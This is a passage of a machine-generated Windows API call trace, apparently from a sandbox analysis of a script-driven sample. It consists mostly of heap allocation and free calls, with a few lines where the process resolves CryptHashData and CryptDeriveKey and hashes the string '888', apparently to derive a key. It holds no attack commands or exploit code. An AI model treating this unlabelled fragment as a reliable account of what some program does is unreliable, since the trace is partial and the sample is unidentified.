RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0255.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0255.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0255.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.681] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0255.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0255.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0255.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0255.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0255.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0255.683] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0255.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0255.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0255.684] CryptHashData (hHash=0xa87090, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0255.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0255.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0255.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0255.684] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0255.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0255.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.686] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0255.686] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0255.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0255.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0255.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0255.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0255.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0255.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0255.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0255.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0255.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0255.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0255.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0255.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0255.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51a78 [0255.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51a78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0255.795] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0255.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0255.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0255.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0255.796] RtlAllocateHeap 